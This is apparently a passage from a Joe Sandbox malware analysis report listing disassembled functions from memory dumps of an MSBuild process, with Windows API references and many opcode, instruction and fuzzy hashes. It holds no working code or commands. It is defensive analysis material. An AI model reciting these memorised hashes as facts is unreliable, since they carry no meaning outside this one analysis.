                              • Opcode Fuzzy Hash: c2ebb3fc521f76123baa6b8d22afb346db40135e6cc340308f7974792c93febb
                              • Instruction Fuzzy Hash: DE419375D01218DFDB18DFA9E480ADDBBF2BF8A304F189129D415AB364DB356842CF54
                              Function 0261D710 Relevance: 1.6, APIs: 1, Instructions: 111libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: a57671c6d0b3173a017178adcba4c147671c149949099ecbc8b5d1f2ea54e031
                              • Instruction ID: 67385f0d9e56a09771d4e5ed11b70fbf3784d6a1f952ea4ae4f7206458a9bd22
                              • Opcode Fuzzy Hash: a57671c6d0b3173a017178adcba4c147671c149949099ecbc8b5d1f2ea54e031
                              • Instruction Fuzzy Hash: 7741C275E01218DFDB18DFA9D490A9EFBF2BF89300F14912AE415AB364DB346842CF54
                              Function 04E67F60 Relevance: 1.6, APIs: 1, Instructions: 111libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 2ab00c2470a5e3fb2d68d98b1b2304c58a0157f5fccddafe40dc7c7aa43ac92e
                              • Instruction ID: 0e80ebcb11c0ca6036d235e9f13ebf11fc6fe03948ba0318ab712ea41b28da27
                              • Opcode Fuzzy Hash: 2ab00c2470a5e3fb2d68d98b1b2304c58a0157f5fccddafe40dc7c7aa43ac92e
                              • Instruction Fuzzy Hash: 4441C274E01208DBEB18DFAAD584ADEFBB2BF88350F149529D405AB254DB30A945CF54
                              Function 04E603E1 Relevance: 1.6, APIs: 1, Instructions: 108memoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlCreateHeap.NTDLL(?,?,?,?,?,?), ref: 04E6049F
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID: CreateHeap
                              • String ID:
                              • API String ID: 10892065-0
                              • Opcode ID: ca3808a904c7672e2e54e9536191ace81d79e01e98cb4b4bd96cf84818a64c4a
                              • Instruction ID: 1156240182c23931e1a75a753e9627eb0ca0178c286b11b9464e0a3cdf9dd214
                              • Opcode Fuzzy Hash: ca3808a904c7672e2e54e9536191ace81d79e01e98cb4b4bd96cf84818a64c4a
                              • Instruction Fuzzy Hash: A64159B9D052599FCF10CFA9D584A9EFBB1AB09310F14A01AE819B7210D375A945CB54
                              Function 0261D720 Relevance: 1.6, APIs: 1, Instructions: 107libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 479020d9497df70e660d85812e25c2c0eaf4960367d266557ff97905dc0b4eaa
                              • Instruction ID: 4c691a1ddadbf7f53cbbb5812e5d2a42babfdc29e78f4b0f1fb8dcdd06a042d7
                              • Opcode Fuzzy Hash: 479020d9497df70e660d85812e25c2c0eaf4960367d266557ff97905dc0b4eaa
                              • Instruction Fuzzy Hash: 1A41C174E01218DFDB58DFA9D484A9EBBF2BF89300F14902AD815BB364DB346842CF54
                              Function 04E603E8 Relevance: 1.6, APIs: 1, Instructions: 107memoryCOMMON
                              Download Yara Rule
                              APIs
                              • RtlCreateHeap.NTDLL(?,?,?,?,?,?), ref: 04E6049F
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID: CreateHeap
                              • String ID:
                              • API String ID: 10892065-0
                              • Opcode ID: 06c16687814d3d86c328e30c29006c3f79eb2bea9ef42e935de36616a54969a7
                              • Instruction ID: d87d9719a9ded4362b775f599e8602d06ce318727026cceb77c5a375d0936b98
                              • Opcode Fuzzy Hash: 06c16687814d3d86c328e30c29006c3f79eb2bea9ef42e935de36616a54969a7
                              • Instruction Fuzzy Hash: C64158B9D052589FCF10CFA9D584A9EFBB5BF09310F24A02AE819B7310D375A945CF64
                              Function 04E6C7B8 Relevance: 1.6, APIs: 1, Instructions: 98libraryCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID: InitializeThunk
                              • String ID:
                              • API String ID: 2994545307-0
                              • Opcode ID: 776c88fcf2a6f5dee7e6240a3f38774d1ba6c97df2c4831c91df02ef90662ec5
                              • Instruction ID: b4cf03ae940fc0c0e8ff6947320ecb31b37f98755a3ef77b3d8ed1b1764a5f1e
                              • Opcode Fuzzy Hash: 776c88fcf2a6f5dee7e6240a3f38774d1ba6c97df2c4831c91df02ef90662ec5
                              • Instruction Fuzzy Hash: 5741C075E012189FDB14CFAAD884ADEBBF2BF89301F20916AE815B7355D7349901CF50
                              Function 04E6FD28 Relevance: 1.6, APIs: 1, Instructions: 82libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryW.KERNELBASE(?), ref: 04E6FDC1
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: e47557824621a496d9b83d56ee928f4a0e4bb5a974d7a20b07fe32f4ba60b527
                              • Instruction ID: 9e2282582da7089e5075407beabfd69314d35263a2a7853db0550ec3548420bb
                              • Opcode Fuzzy Hash: e47557824621a496d9b83d56ee928f4a0e4bb5a974d7a20b07fe32f4ba60b527
                              • Instruction Fuzzy Hash: E631A8B8D01219DFCB14CFA9D984A9EFBF5BB49314F14906AE809B7310D374A945CF64
                              Function 04E6FD30 Relevance: 1.6, APIs: 1, Instructions: 79libraryCOMMON
                              Download Yara Rule
                              APIs
                              • LoadLibraryW.KERNELBASE(?), ref: 04E6FDC1
                              Memory Dump Source
                              • Source File: 00000003.00000002.3839037344.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e60000_MSBuild.jbxd
                              Similarity
                              • API ID: LibraryLoad
                              • String ID:
                              • API String ID: 1029625771-0
                              • Opcode ID: 458501214be9ab63c04d90b3cfc001b100ac3a9ea815687a69d1777d58aacb4c
                              • Instruction ID: a24b0574a92bc5908cec746289cb98de2941709f92798b70061ffd5d95bc2fe8
                              • Opcode Fuzzy Hash: 458501214be9ab63c04d90b3cfc001b100ac3a9ea815687a69d1777d58aacb4c
                              • Instruction Fuzzy Hash: 3431A8B4D012199FCB10CFA9E984A9EFBF5BB49314F14906AE809B7310D374A945CFA4
                              Function 0261CF58 Relevance: 1.5, APIs: 1, Instructions: 43COMMON
                              Download Yara Rule
                              APIs
                              • KiUserExceptionDispatcher.NTDLL ref: 0261CF8C
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID: DispatcherExceptionUser
                              • String ID:
                              • API String ID: 6842923-0
                              • Opcode ID: 25fe20a4841b49d7826c501d938e9aa41fd8ae648a3dab926f70c100b0445094
                              • Instruction ID: 4829276e5e3f43a5d3e0f2110f98915ae08b4b3602be6f7c4c259239fcfe6cba
                              • Opcode Fuzzy Hash: 25fe20a4841b49d7826c501d938e9aa41fd8ae648a3dab926f70c100b0445094
                              • Instruction Fuzzy Hash: DF11FCB4E01219DFCB04DFAAC5087AEBBF0EF89300F1084AAD814A3380E7341A45CB91
                              Function 0261CF48 Relevance: 1.5, APIs: 1, Instructions: 41COMMON
                              Download Yara Rule
                              APIs
                              • KiUserExceptionDispatcher.NTDLL ref: 0261CF8C
                              Memory Dump Source
                              • Source File: 00000003.00000002.3815932788.0000000002610000.00000040.00000800.00020000.00000000.sdmp, Offset: 02610000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_2610000_MSBuild.jbxd
                              Similarity
                              • API ID: DispatcherExceptionUser
                              • String ID:
                              • API String ID: 6842923-0
                              • Opcode ID: 2a30a863e091bc017b5406ec6db35e1493210b44158667a325477afd9c4aeb49
                              • Instruction ID: 48788b9338593e030540ec408d19c074e4f23a5b2f4d3cf9602e441bca5f7f86
                              • Opcode Fuzzy Hash: 2a30a863e091bc017b5406ec6db35e1493210b44158667a325477afd9c4aeb49
                              • Instruction Fuzzy Hash: 060156B0D05218DFDB04CFAAC9047EEBBF1AF49304F0485AAC814A3391E3381B45CB51
                              Function 05B88DC0 Relevance: 1.5, Strings: 1, Instructions: 245COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: -
                              • API String ID: 0-2547889144
                              • Opcode ID: 5489324d484d36c4c30d8e8e12663bfb36bcd07847e0536d5750c8769bea6d61
                              • Instruction ID: c432d8784b222c83fea501035e52cff72cf51cd36e72812505cefa2770b60ec7
                              • Opcode Fuzzy Hash: 5489324d484d36c4c30d8e8e12663bfb36bcd07847e0536d5750c8769bea6d61
                              • Instruction Fuzzy Hash: 23B11674A10614CFCB58DF69C884A69BBF6FF88700B5185AAE806DB366DB70EC45CF50
                              Function 04E5D291 Relevance: 1.4, Strings: 1, Instructions: 189COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: d
                              • API String ID: 0-2564639436
                              • Opcode ID: 565b0ce4f8a215115a3f473750601dd032462d9a635da21c9eec0edccfe38a18
                              • Instruction ID: 3ceb881bbfe69e1747ce011274a7d08ed126cb9ce19a46f071a65874b5cd8bb2
                              • Opcode Fuzzy Hash: 565b0ce4f8a215115a3f473750601dd032462d9a635da21c9eec0edccfe38a18
                              • Instruction Fuzzy Hash: 3E71AB30A00A06CFCB11DF59C8C09ADFBB2FF88314755C96AD9599B626D734F861CBA0
                              Function 05B85501 Relevance: 1.4, Strings: 1, Instructions: 165COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: U
                              • API String ID: 0-3372436214
                              • Opcode ID: ebf89bec0a9469e08792993e4cb7d1081b525241f47c0d51a86f31155adc3008
                              • Instruction ID: 5a38f334305e5339ece606a29be0eb7faf45c1083faad3c34e3671da30ec3930
                              • Opcode Fuzzy Hash: ebf89bec0a9469e08792993e4cb7d1081b525241f47c0d51a86f31155adc3008
                              • Instruction Fuzzy Hash: 2B71B074D006099FCB14DFA9D894ADDFBB1FF89300F24826AE409AB251EB30A945CF54
                              Function 04E593A0 Relevance: 1.4, Instructions: 1395COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: c61df6939f0d780dbef1ca8e60cb7151745d58e5e27a45f650682fb15c8f8b0a
                              • Instruction ID: 5b7b36f6c31e2e353911662172a6c01ecd5997f08be11dcfc4cb15036e5bc6cd
                              • Opcode Fuzzy Hash: c61df6939f0d780dbef1ca8e60cb7151745d58e5e27a45f650682fb15c8f8b0a
                              • Instruction Fuzzy Hash: 99E23C74A442199FDB24EF50EC95BAD7732FB89300F1080ACEA0A2B795DE715E41EF51
                              Function 05B3EAD8 Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID: @
                              • API String ID: 0-2766056989
                              • Opcode ID: d33c92e8a44bc2e02e43fe15a12149e8553fa755049b011f3e9d32fdb8bc2913
                              • Instruction ID: 6f62e67a2cf732f5ae353ab2d27e410454933aa3979189c494eb3a29c199f623
                              • Opcode Fuzzy Hash: d33c92e8a44bc2e02e43fe15a12149e8553fa755049b011f3e9d32fdb8bc2913
                              • Instruction Fuzzy Hash: 53518F75A042499FDB11CF64C485EAEBBF6FF89310F0980A6E906AB361D730ED45CB90
                              Function 04E5E770 Relevance: .4, Instructions: 432COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ad29dd7c6cb4801ede8a72c27b9b7aa32b4ef06e47a6b93e49f9527f54d90d71
                              • Instruction ID: b15816c6f013bdb4912bdb1ae8f4da9163d038a599ea9ec7a81a147b6b404448
                              • Opcode Fuzzy Hash: ad29dd7c6cb4801ede8a72c27b9b7aa32b4ef06e47a6b93e49f9527f54d90d71
                              • Instruction Fuzzy Hash: B8F16D30B047418FDB25CF79C544AAABBF6BF88305F1499A9E846D7261DB30FA41CB51
                              Function 05B3BF28 Relevance: .4, Instructions: 419COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 43d4fcf7e221577da2fb4f94b8c5423529f7a14b368524fce19b40ff6978b226
                              • Instruction ID: b2e36463407ce95dada9d014acc7cfed46e555447a18c86b2fb2f171ec39a1d7
                              • Opcode Fuzzy Hash: 43d4fcf7e221577da2fb4f94b8c5423529f7a14b368524fce19b40ff6978b226
                              • Instruction Fuzzy Hash: 85022B75A002499FCB05DFA8D484A9EBBF2FF89310F1585A9E845AB361DB30ED45CF90
                              Function 05B3CED1 Relevance: .3, Instructions: 339COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fc94d86f15c2edc88fe6f190cbf59b8e1ae321d7543982e578f0ebbbd35ec1b8
                              • Instruction ID: cd67861a3f358df268aded092ba2ecae99b629da78f1733ffbe23cdb7772e525
                              • Opcode Fuzzy Hash: fc94d86f15c2edc88fe6f190cbf59b8e1ae321d7543982e578f0ebbbd35ec1b8
                              • Instruction Fuzzy Hash: 84D12675B006158FCB04DFA8D985EAEBBF2FF88350B1585A9E905AB361DB30EC45CB50
                              Function 04E5CAFF Relevance: .3, Instructions: 280COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 73c6913a2f583da15f2797a279a495c3fe5118bed2225b7d57edc2422d2d45af
                              • Instruction ID: ce924aaede56f6ca3e9da8e22e1b36f194b7509513df7480a464f5d86d7b368f
                              • Opcode Fuzzy Hash: 73c6913a2f583da15f2797a279a495c3fe5118bed2225b7d57edc2422d2d45af
                              • Instruction Fuzzy Hash: FA919434B04345CFEB649A79847477A37E6BBC9609730A4A5DD06DB3B0EE60EC01D762
                              Function 04E5FA2B Relevance: .2, Instructions: 237COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ff0146778f30be4493d13283b56e4aef8661ad4e237054ec0c1e1286816c5d61
                              • Instruction ID: 222c8b9f5076d7a0b5ab6da4dfcdf322f33a49a0c33872857e7c94dc65fff593
                              • Opcode Fuzzy Hash: ff0146778f30be4493d13283b56e4aef8661ad4e237054ec0c1e1286816c5d61
                              • Instruction Fuzzy Hash: 42A10770E00209DFDB15DFA8C594AADBBF2EF48300F14556AD815AB361EB34ED45CB61
                              Function 04E59068 Relevance: .2, Instructions: 230COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 51d078f3655583ec825a095f571895ce7e44b7b49b083cf3664b4007c6a11df5
                              • Instruction ID: 6fdd3429cb5b0283efa252296875b9100e4956d8f31069bc4fcb76786c65fdc7
                              • Opcode Fuzzy Hash: 51d078f3655583ec825a095f571895ce7e44b7b49b083cf3664b4007c6a11df5
                              • Instruction Fuzzy Hash: 99A13B756003019FDB15DF68D884D5EBBB2FF883107148AA8E44A8B762DB30FD46DBA1
                              Function 05B3BFE8 Relevance: .2, Instructions: 226COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843540424.0000000005B30000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B30000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b30000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 19e3c86de12ac195ace5a8cc8779fbd70b19eb018f280f3f45439be9c3af53fd
                              • Instruction ID: 532d65ce3c445f0eb7f769ff06bd42a3ae186d5b0a3903545eeafe558f972100
                              • Opcode Fuzzy Hash: 19e3c86de12ac195ace5a8cc8779fbd70b19eb018f280f3f45439be9c3af53fd
                              • Instruction Fuzzy Hash: 02A1C575A006099FCB14DFA8D485AAEBBF2FF48310B158599E809AB361DB31FD45CB90
                              Function 05B8FB18 Relevance: .2, Instructions: 223COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 6d9eb8ba889b68d052291bc48a2578db8e5941cc09923755374053bbc1e38c99
                              • Instruction ID: c63a817c368cbe1b72f213db7bf8a64195e6db52062b94f090034b8fefac04f7
                              • Opcode Fuzzy Hash: 6d9eb8ba889b68d052291bc48a2578db8e5941cc09923755374053bbc1e38c99
                              • Instruction Fuzzy Hash: 0E711731B182669BDB14EB75C8617BE77E2FF84301F1894B9E942D7280EB34E941D7A0
                              Function 05B85AE8 Relevance: .2, Instructions: 191COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: d416d0ee47b015804aef8db52e6d4883383d990bfb940d5131fa6fe46f963a95
                              • Instruction ID: 8841d31402f9e14278771b5bb33aa94fcfd06726ede00561e2b66c232c6c7bcb
                              • Opcode Fuzzy Hash: d416d0ee47b015804aef8db52e6d4883383d990bfb940d5131fa6fe46f963a95
                              • Instruction Fuzzy Hash: DE917B75E01218DFCB54DFA9D984A9DBBF1BB48300F2481AAD809A7354E735AE41CF50
                              Function 05B84300 Relevance: .2, Instructions: 187COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3843979925.0000000005B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B80000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_5b80000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 1d0feab467122526c1945f3b802eb4f87c560c799640eb9746c086be7c14be58
                              • Instruction ID: 6e2dc8f2a569887d9d1ec0cb04505834d7828d71d9772687a7e998b1e75e04d9
                              • Opcode Fuzzy Hash: 1d0feab467122526c1945f3b802eb4f87c560c799640eb9746c086be7c14be58
                              • Instruction Fuzzy Hash: 8E917A75E01218CFCB54DFA9D984A9DBBF2BB48300F2485AAE819A7354DB35AE41CF50
                              Function 04E5FAA5 Relevance: .2, Instructions: 186COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: aafe835ce16cdbd495eb14e8e62ea1b6dd68cace93103171089f2d21b9c59449
                              • Instruction ID: d50f67504a6aec49efd149fba6171bc4fbe4143d3b288cf5fb292dd5e268b9dd
                              • Opcode Fuzzy Hash: aafe835ce16cdbd495eb14e8e62ea1b6dd68cace93103171089f2d21b9c59449
                              • Instruction Fuzzy Hash: 4971F774E002099FDB15DFA9C484A9DBBF2FF88304F14856AD815AB361DB34ED45CB60
                              Function 04E5FAB9 Relevance: .2, Instructions: 186COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: dfab9a83875489a0592fdc21fcde8ca18449c8cbd35d183571147540e15e0c74
                              • Instruction ID: 3498251de1a06d588ade0d6f8a5cf72df8635998a25bb313a4aacbcce2723375
                              • Opcode Fuzzy Hash: dfab9a83875489a0592fdc21fcde8ca18449c8cbd35d183571147540e15e0c74
                              • Instruction Fuzzy Hash: 1E71F774E002099FDB15DFA9C484AADBBF2FF88304F14856AD815AB361DB34ED45CB60
                              Function 04E5FA87 Relevance: .2, Instructions: 186COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ab7c104e4f07d81b5d13d037af5352dd5321c408def087d646b8aa1e61e5a3fd
                              • Instruction ID: 9967f5e2a9d92810a54a11ccf3d0e41cee3af39eb5a4bd26fa633f660428ab01
                              • Opcode Fuzzy Hash: ab7c104e4f07d81b5d13d037af5352dd5321c408def087d646b8aa1e61e5a3fd
                              • Instruction Fuzzy Hash: 3871F674E002099FDB15DFA9C494A9DBBF2FF88304F14856AD815AB361DB34ED45CB60
                              Function 04E5FA91 Relevance: .2, Instructions: 186COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b01952e11532f4f7abaa22246f8fb24efabab115d4ead24254882ba24527e73c
                              • Instruction ID: acb930fdb6d653941fd2a5edb81862728a250943a3684da9183834210c389a05
                              • Opcode Fuzzy Hash: b01952e11532f4f7abaa22246f8fb24efabab115d4ead24254882ba24527e73c
                              • Instruction Fuzzy Hash: 4071F774E002099FDB15DFA9C484A9EBBF2FF88304F14856AD815AB361DB34ED45CB60
                              Function 04E5FA9B Relevance: .2, Instructions: 186COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 629889e36d18dd19233490a23602c85a8657f9062173e854d2791c6de5dd422b
                              • Instruction ID: bf7aea68697417db15bc999dde7600921377aa55f55678fa8522bf3c13e3aabf
                              • Opcode Fuzzy Hash: 629889e36d18dd19233490a23602c85a8657f9062173e854d2791c6de5dd422b
                              • Instruction Fuzzy Hash: C971F674E002099FDB15DFA9C484A9EBBF2FF88304F14856AD815AB361DB34ED45CB60
                              Function 04E5FA69 Relevance: .2, Instructions: 186COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 80b3e519b80e48cc32112b8291f17f4116f81578b05927a44f62b2823215dfbe
                              • Instruction ID: 22ea97a38900183095b89c7225cfc2bd650d993b8477fa96709a071c57048d14
                              • Opcode Fuzzy Hash: 80b3e519b80e48cc32112b8291f17f4116f81578b05927a44f62b2823215dfbe
                              • Instruction Fuzzy Hash: 7871F774E002099FDB15DFA9C484A9DBBF2FF88304F14856AD815AB361DB34ED45CB60
                              Function 04E5FA73 Relevance: .2, Instructions: 186COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0bb2c94c8c2611051e88b2158ffd68d9c7df5f991d9097a3e1c25fab3fd6e59f
                              • Instruction ID: 40246d2fccd243790f0ce77dd91ebdfb9050b96e42d8da78bef19efdfc412479
                              • Opcode Fuzzy Hash: 0bb2c94c8c2611051e88b2158ffd68d9c7df5f991d9097a3e1c25fab3fd6e59f
                              • Instruction Fuzzy Hash: A871F674E002099FDB15DFA9C484A9DBBF2FF88304F14856AD815AB361EB34ED45CB61
                              Function 04E5FA7D Relevance: .2, Instructions: 186COMMON
                              Download Yara Rule
                              Memory Dump Source
                              • Source File: 00000003.00000002.3838946954.0000000004E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E50000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4e50000_MSBuild.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
